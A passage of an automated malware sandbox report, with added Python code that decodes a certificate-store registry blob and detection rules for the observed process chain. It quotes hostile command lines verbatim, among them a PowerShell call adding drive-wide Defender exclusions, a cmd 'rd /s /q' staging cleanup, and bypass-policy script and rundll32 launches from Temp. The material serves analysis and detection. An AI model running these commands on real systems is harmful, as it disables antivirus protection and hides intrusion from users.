| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 190000000100000010000000d0fd3c9c380d7b65e26b9a3fedd39b8f0f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b1400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba953030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad040000000100000010000000c5dfb849ca051355ee2dba1ac33eb0282000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e326
0e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe | N/A |
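The Blob values above are CryptoAPI serialized certificate elements, and the key name under Certificates\ is the certificate's SHA-1 thumbprint. Read that way, this "Modifies system certificate store" hit is less alarming than it sounds: the friendly-name property in the hex decodes (UTF-16LE) to "GlobalSign Root CA - R3", the stored SHA-1 property equals the key name D69B5611...76AD, and that is the thumbprint of the public GlobalSign R3 root, which Windows itself caches into AuthRoot through root auto-update after a process makes an outbound TLS connection chaining to it. The decoder below is an added example, not part of the sandbox report; it walks the property list, cross-checks the key name against the stored hash and the hash of the embedded DER certificate, and flags thumbprints of known public roots. The sample blob is constructed here with a placeholder byte string standing in for the DER certificate, and the property-ID names are the wincrypt.h constants; to run it on the report's own rows, join the split hex back into one string and pass it with the key name.

```python
"""Decoder for the CryptoAPI serialized-certificate 'Blob' value that Windows writes
under HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\<store>\\Certificates\\<sha1>.
Added example, not part of the sandbox report. Layout: repeated
[prop_id u32][reserved u32 = 1][length u32][data]; the property IDs are the
wincrypt.h CERT_*_PROP_ID constants (only the ones needed here are listed).
"""
import hashlib
import struct

PROP_NAMES = {
    0x03: "CERT_SHA1_HASH_PROP_ID",
    0x04: "CERT_MD5_HASH_PROP_ID",
    0x09: "CERT_ENHKEY_USAGE_PROP_ID",
    0x0B: "CERT_FRIENDLY_NAME_PROP_ID",
    0x0F: "CERT_SIGNATURE_HASH_PROP_ID",
    0x14: "CERT_KEY_IDENTIFIER_PROP_ID",
    0x20: "CERT_CERT_PROP_ID",
}
CERT_SHA1_HASH_PROP_ID = 0x03
CERT_FRIENDLY_NAME_PROP_ID = 0x0B
CERT_CERT_PROP_ID = 0x20

# Thumbprint taken from the report's key name: the public GlobalSign Root CA - R3,
# which Windows caches into AuthRoot by itself. Extend with other trusted roots.
KNOWN_PUBLIC_ROOTS = {"d69b561148f01c77c54578c10926df5b856976ad": "GlobalSign Root CA - R3"}


def parse_blob(blob: bytes) -> dict:
    """Walk the property list and return {prop_id: data}. Rejects truncated or
    malformed input instead of silently returning a partial result."""
    props, off = {}, 0
    while off < len(blob):
        if len(blob) - off < 12:
            raise ValueError(f"truncated property header at offset {off}")
        prop_id, reserved, length = struct.unpack_from("<III", blob, off)
        off += 12
        if reserved != 1:
            raise ValueError(f"unexpected reserved field {reserved} at offset {off - 8}")
        if off + length > len(blob):
            raise ValueError(f"property {prop_id:#x} runs past end of blob")
        props[prop_id] = blob[off:off + length]
        off += length
    return props


def describe_blob(key_name: str, blob_hex: str) -> dict:
    """Decode the blob and cross-check it against the registry key name."""
    props = parse_blob(bytes.fromhex(blob_hex))
    cert_der = props.get(CERT_CERT_PROP_ID, b"")
    sha1_actual = hashlib.sha1(cert_der).hexdigest() if cert_der else None
    sha1_stored = props.get(CERT_SHA1_HASH_PROP_ID, b"").hex() or None
    friendly = props.get(CERT_FRIENDLY_NAME_PROP_ID, b"")
    friendly_name = friendly.decode("utf-16-le").rstrip("\x00") if friendly else None
    thumbprint = key_name.rsplit("\\", 1)[-1].lower()
    return {
        "properties": [PROP_NAMES.get(p, f"prop_{p:#x}") for p in props],
        "friendly_name": friendly_name,
        "cert_length": len(cert_der),
        # key name, stored hash and hash of the DER must all agree for a CryptoAPI write
        "thumbprint_consistent": thumbprint == sha1_stored == sha1_actual,
        "known_public_root": KNOWN_PUBLIC_ROOTS.get(thumbprint),
    }


def build_blob(friendly_name: str, cert_der: bytes) -> bytes:
    """Serialize a minimal blob in the same format (used to build the sample input)."""
    def prop(pid, data):
        return struct.pack("<III", pid, 1, len(data)) + data
    name = friendly_name.encode("utf-16-le") + b"\x00\x00"
    return (prop(CERT_FRIENDLY_NAME_PROP_ID, name)
            + prop(CERT_SHA1_HASH_PROP_ID, hashlib.sha1(cert_der).digest())
            + prop(CERT_CERT_PROP_ID, cert_der))


# Constructed sample: a placeholder stands in for the DER certificate, so the
# thumbprint below belongs to the placeholder, not to any real CA.
SAMPLE_CERT = b"\x30\x82\x00\x10" + b"constructed-der-placeholder"
SAMPLE_KEY = ("\\REGISTRY\\MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot"
              "\\Certificates\\" + hashlib.sha1(SAMPLE_CERT).hexdigest().upper())
SAMPLE_BLOB_HEX = build_blob("Example Test Root", SAMPLE_CERT).hex()

if __name__ == "__main__":
    print(describe_blob(SAMPLE_KEY, SAMPLE_BLOB_HEX))
```

The triage rule that falls out of this: an AuthRoot write whose thumbprint is a known public root and whose three hashes agree is cache behaviour; a write to Root or AuthRoot with an unknown thumbprint, a friendly name that does not match the subject, or a key name that disagrees with the embedded certificate is the case worth treating as a rogue root.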
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1428 wrote to memory of 216 | N/A | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 1428 wrote to memory of 216 | N/A | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 1428 wrote to memory of 216 | N/A | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 1428 wrote to memory of 3564 | N/A | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe | C:\Windows\SysWOW64\cmd.exe |
| PID 1428 wrote to memory of 3564 | N/A | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe | C:\Windows\SysWOW64\cmd.exe |
| PID 1428 wrote to memory of 3564 | N/A | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe | C:\Windows\SysWOW64\cmd.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe
"C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath $env:ProgramData, $env:AppData, $env:SystemDrive\ "
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /K rd /s /q "C:\Users\Admin\AppData\Roaming\services" & EXIT
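The process tree above is the most detection-relevant part of this run: a binary under %TEMP% spawns powershell.exe to add Defender path exclusions for $env:ProgramData, $env:AppData and the root of $env:SystemDrive (which together cover nearly everything the later payloads touch), then spawns cmd.exe to delete its own staging directory. The rules below are an added example, not part of the sandbox report; they run over constructed process-creation records built from the command lines on this page (PIDs 1428, 216 and 3564 are the report's, the parent PID 1000 and the remaining PIDs are made up, and the pid/ppid/image/cmdline record shape is an assumption). They also cover the "powershell -ExecutionPolicy bypass -File <script in Temp>" and "rundll32 <dll in Temp>,#1" patterns from the other detonations on the page, and grade an exclusion by how broad its paths are, so an administrator excluding one build directory scores lower than this sample.

```python
"""Detection rules for the behavioral13 chain: Launcher.exe (dropped under %TEMP%)
spawns powershell.exe to add broad Defender exclusions and cmd.exe to wipe its own
staging directory. Added example, not part of the sandbox report. Event layout is a
simplified Sysmon-style process-creation record and is an assumption.
"""
import re

# Exclusion targets that switch scanning off for a whole profile tree or drive
BROAD_ROOTS = {
    "$env:programdata", "$env:appdata", "$env:localappdata", "$env:systemdrive",
    "$env:userprofile", "$env:temp", "%programdata%", "%appdata%", "%localappdata%",
    "%systemdrive%", "%userprofile%", "%temp%", "c:\\programdata", "c:\\users",
}
USER_WRITABLE = re.compile(r"\\Users\\[^\\]+\\AppData\\", re.IGNORECASE)
TEMP_DIR = re.compile(r"\\AppData\\Local\\Temp\\", re.IGNORECASE)
EXCLUSION_ARGS = re.compile(r"Add-MpPreference\b.*?-ExclusionPath\s+([^\"']+)", re.IGNORECASE)
BYPASS_FILE = re.compile(r"-ExecutionPolicy\s+bypass\b.*?-File\s+\"?([^\"\s]+\.ps1)", re.IGNORECASE)
RD_RECURSIVE = re.compile(r"\brd\s+/s\s+/q\s+\"?([^\"&]+?)\"?\s*(?:&|$)", re.IGNORECASE)
RUNDLL_ORDINAL = re.compile(r"rundll32(?:\.exe)?\s+\"?([^\",]+\.dll)\"?\s*,\s*#(\d+)", re.IGNORECASE)


def image_name(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def broad_exclusions(arg_text: str) -> list:
    """Split a comma-separated -ExclusionPath list and keep the entries that cover a
    whole profile tree or a drive root (e.g. $env:SystemDrive\\ or C:\\)."""
    broad = []
    for raw in arg_text.split(","):
        item = raw.strip().strip("'\"")
        norm = item.rstrip("\\").lower()
        if norm in BROAD_ROOTS or re.fullmatch(r"[a-z]:", norm):
            broad.append(item)
    return broad


def evaluate(events: list) -> list:
    """Return (rule, pid, severity, detail) for every matching event."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        img, cmd, pid = image_name(e["image"]), e["cmdline"], e["pid"]
        parent = by_pid.get(e["ppid"])
        # T1562.001: Defender exclusion added; broad roots raise the severity
        if img == "powershell.exe" and (m := EXCLUSION_ARGS.search(cmd)):
            roots = broad_exclusions(m.group(1))
            findings.append(("defender_exclusion_added", pid,
                             "high" if roots else "medium", f"broad={roots}"))
        # LOLBin started by a parent that itself lives in a user-writable path
        if img in {"powershell.exe", "cmd.exe", "rundll32.exe"} and parent \
                and USER_WRITABLE.search(parent["image"]):
            findings.append(("lolbin_child_of_user_writable_binary", pid, "medium",
                             f"parent={image_name(parent['image'])}"))
        # Staging directory removed with rd /s /q (cleanup / anti-forensics)
        if img == "cmd.exe" and (m := RD_RECURSIVE.search(cmd)) \
                and USER_WRITABLE.search(m.group(1)):
            findings.append(("staging_dir_self_delete", pid, "medium", m.group(1)))
        # powershell -ExecutionPolicy bypass -File <script under %TEMP%>
        if img == "powershell.exe" and (m := BYPASS_FILE.search(cmd)) \
                and TEMP_DIR.search(m.group(1)):
            findings.append(("bypass_script_from_temp", pid, "medium", m.group(1)))
        # rundll32 loading a DLL by export ordinal from a user-writable path
        if img == "rundll32.exe" and (m := RUNDLL_ORDINAL.search(cmd)) \
                and USER_WRITABLE.search(m.group(1)):
            findings.append(("rundll32_ordinal_from_user_path", pid, "medium",
                             f"{m.group(1)} ordinal #{m.group(2)}"))
    return findings


def rules_by_pid(findings: list) -> dict:
    out = {}
    for rule, pid, _sev, _detail in findings:
        out.setdefault(pid, []).append(rule)
    return {pid: sorted(r) for pid, r in out.items()}


# Constructed records: command lines from this page; PPID 1000 and PIDs 5000/6000 are made up.
SAMPLE_EVENTS = [
    {"pid": 1428, "ppid": 1000, "image": r"C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe",
     "cmdline": r'"C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe"'},
    {"pid": 216, "ppid": 1428, "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath $env:ProgramData, $env:AppData, $env:SystemDrive\ "'},
    {"pid": 3564, "ppid": 1428, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r'"C:\Windows\System32\cmd.exe" /K rd /s /q "C:\Users\Admin\AppData\Roaming\services" & EXIT'},
    {"pid": 4848, "ppid": 1000, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\Tools\dkAdSRKzVAXO.ps1"},
    {"pid": 5000, "ppid": 1000, "image": r"C:\Windows\system32\rundll32.exe",
     "cmdline": r"rundll32.exe C:\Users\Admin\AppData\Local\Temp\data\TC7Z64.dll,#1"},
    # benign control: a narrow exclusion for one build directory
    {"pid": 6000, "ppid": 1000, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell.exe -Command "Add-MpPreference -ExclusionPath C:\Build\out"'},
]

if __name__ == "__main__":
    for finding in evaluate(SAMPLE_EVENTS):
        print(finding)
```

The parent-path rule is what ties the chain together: neither powershell.exe nor cmd.exe is suspicious on its own, but both being children of an executable under AppData\Local\Temp, one adding drive-wide exclusions and the other deleting a sibling directory, is the pattern to alert on. Note that the exclusion write is only visible in process command lines if the sensor captures them; the resulting change also lands under HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths, which is worth monitoring independently.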
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 79.121.231.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.173.189.20.in-addr.arpa | udp |
Files
memory/216-2-0x00000000029E0000-0x0000000002A16000-memory.dmp
memory/216-4-0x0000000006750000-0x0000000006760000-memory.dmp
memory/216-5-0x0000000006750000-0x0000000006760000-memory.dmp
memory/216-3-0x0000000072590000-0x0000000072C7E000-memory.dmp
memory/216-6-0x0000000006D90000-0x00000000073B8000-memory.dmp
memory/216-7-0x0000000006B10000-0x0000000006B32000-memory.dmp
memory/216-8-0x00000000074C0000-0x0000000007526000-memory.dmp
memory/216-9-0x0000000006CB0000-0x0000000006D16000-memory.dmp
memory/216-10-0x00000000075F0000-0x0000000007940000-memory.dmp
memory/216-11-0x0000000007530000-0x000000000754C000-memory.dmp
memory/216-12-0x0000000007AD0000-0x0000000007B1B000-memory.dmp
memory/216-13-0x0000000007D20000-0x0000000007D96000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nyf2y54q.0jq.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/216-30-0x000000007E570000-0x000000007E580000-memory.dmp
memory/216-31-0x0000000008DA0000-0x0000000008DD3000-memory.dmp
memory/216-32-0x0000000070FB0000-0x0000000070FFB000-memory.dmp
memory/216-33-0x0000000008D80000-0x0000000008D9E000-memory.dmp
memory/216-38-0x0000000008DE0000-0x0000000008E85000-memory.dmp
memory/216-39-0x0000000006750000-0x0000000006760000-memory.dmp
memory/216-40-0x00000000090A0000-0x0000000009134000-memory.dmp
memory/216-233-0x0000000006870000-0x000000000688A000-memory.dmp
memory/216-238-0x0000000006860000-0x0000000006868000-memory.dmp
memory/216-254-0x0000000072590000-0x0000000072C7E000-memory.dmp
Analysis: behavioral18
Detonation Overview
Submitted
2024-02-23 10:15
Reported
2024-02-23 10:22
Platform
win10-20240221-en
Max time kernel
128s
Max time network
136s
Command Line
Signatures
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: 33 (SeIncreaseWorkingSetPrivilege) | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\Data\YXNOU01Xhpmc.ps1
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x234
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 123.10.44.20.in-addr.arpa | udp |
Files
memory/1376-5-0x00007FF9C4B90000-0x00007FF9C557C000-memory.dmp
memory/1376-4-0x00000114708F0000-0x0000011470912000-memory.dmp
memory/1376-6-0x0000011470960000-0x0000011470970000-memory.dmp
memory/1376-9-0x0000011470DF0000-0x0000011470E66000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3riaytwg.avm.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/1376-30-0x0000011470960000-0x0000011470970000-memory.dmp
memory/1376-36-0x00007FF9C4B90000-0x00007FF9C557C000-memory.dmp
Analysis: behavioral23
Detonation Overview
Submitted
2024-02-23 10:15
Reported
2024-02-23 10:22
Platform
win10-20240221-en
Max time kernel
128s
Max time network
137s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\data\TCLZMA64.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 138.91.171.81:80 | N/A | tcp |
| US | 8.8.8.8:53 | 129.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.173.189.20.in-addr.arpa | udp |
Files
Analysis: behavioral25
Detonation Overview
Submitted
2024-02-23 10:15
Reported
2024-02-23 10:23
Platform
win10-20240221-en
Max time kernel
119s
Max time network
138s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\data\TCshareWin10x64.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 20.231.121.79:80 | N/A | tcp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 169.117.168.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 189.178.17.96.in-addr.arpa | udp |
Files
Analysis: behavioral28
Detonation Overview
Submitted
2024-02-23 10:15
Reported
2024-02-23 10:22
Platform
win10-20240221-en
Max time kernel
115s
Max time network
140s
Command Line
Signatures
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\Tools\dkAdSRKzVAXO.ps1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 96.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.143.182.52.in-addr.arpa | udp |
Files
memory/4848-4-0x00007FFDE2120000-0x00007FFDE2B0C000-memory.dmp
memory/4848-5-0x000002ADE9E90000-0x000002ADE9EA0000-memory.dmp
memory/4848-7-0x000002ADE9E90000-0x000002ADE9EA0000-memory.dmp
memory/4848-6-0x000002ADE9EA0000-0x000002ADE9EC2000-memory.dmp
memory/4848-10-0x000002ADEA050000-0x000002ADEA0C6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_edausfig.gxw.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/4848-32-0x000002ADE9E90000-0x000002ADE9EA0000-memory.dmp
memory/4848-34-0x00007FFDE2120000-0x00007FFDE2B0C000-memory.dmp
memory/4848-35-0x000002ADE9E90000-0x000002ADE9EA0000-memory.dmp
memory/4848-36-0x000002ADE9E90000-0x000002ADE9EA0000-memory.dmp
memory/4848-37-0x000002ADE9E90000-0x000002ADE9EA0000-memory.dmp
Analysis: behavioral31
Detonation Overview
Submitted
2024-02-23 10:15
Reported
2024-02-23 10:22
Platform
win10-20240221-en
Max time kernel
124s
Max time network
132s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\data\WCMICONS.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\data\WCMICONS.exe
"C:\Users\Admin\AppData\Local\Temp\data\WCMICONS.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 228 -s 232
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 241.110.86.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 7.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
Files
Analysis: behavioral22
Detonation Overview
Submitted
2024-02-23 10:15
Reported
2024-02-23 10:22
Platform
win10-20240221-en
Max time kernel
128s
Max time network
136s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\data\TC7Z64.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 129.134.221.88.in-addr.arpa | udp |
| US | 20.231.121.79:80 | N/A | tcp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.65.42.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
Files
Analysis: behavioral24
Detonation Overview
Submitted
2024-02-23 10:15
Reported
2024-02-23 10:23
Platform
win10-20240221-en
Max time kernel
121s
Max time network
140s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\data\TCUNZL64.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 12.173.189.20.in-addr.arpa | udp |
Files
Analysis: behavioral6
Detonation Overview
Submitted
2024-02-23 10:15
Reported
2024-02-23 10:22
Platform
win10-20240221-en
Max time kernel
117s
Max time network
143s
Command Line
Signatures
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\AppInfo\Xfh5GWnGPMjT.ps1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 96.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 85.65.42.20.in-addr.arpa | udp |
Files
memory/3700-4-0x000001A277410000-0x000001A277432000-memory.dmp
memory/3700-7-0x000001A2776D0000-0x000001A277746000-memory.dmp
memory/3700-8-0x00007FFC0F980000-0x00007FFC1036C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_axv4kz30.xqb.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/3700-18-0x000001A277440000-0x000001A277450000-memory.dmp
memory/3700-17-0x000001A277440000-0x000001A277450000-memory.dmp
memory/3700-31-0x000001A277440000-0x000001A277450000-memory.dmp
memory/3700-34-0x00007FFC0F980000-0x00007FFC1036C000-memory.dmp
memory/3700-35-0x000001A277440000-0x000001A277450000-memory.dmp
memory/3700-36-0x000001A277440000-0x000001A277450000-memory.dmp
memory/3700-37-0x000001A277440000-0x000001A277450000-memory.dmp
Analysis: behavioral8
Detonation Overview
Submitted
2024-02-23 10:15
Reported
2024-02-23 10:22
Platform
win10-20240221-en
Max time kernel
128s
Max time network
137s
Command Line
Signatures
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
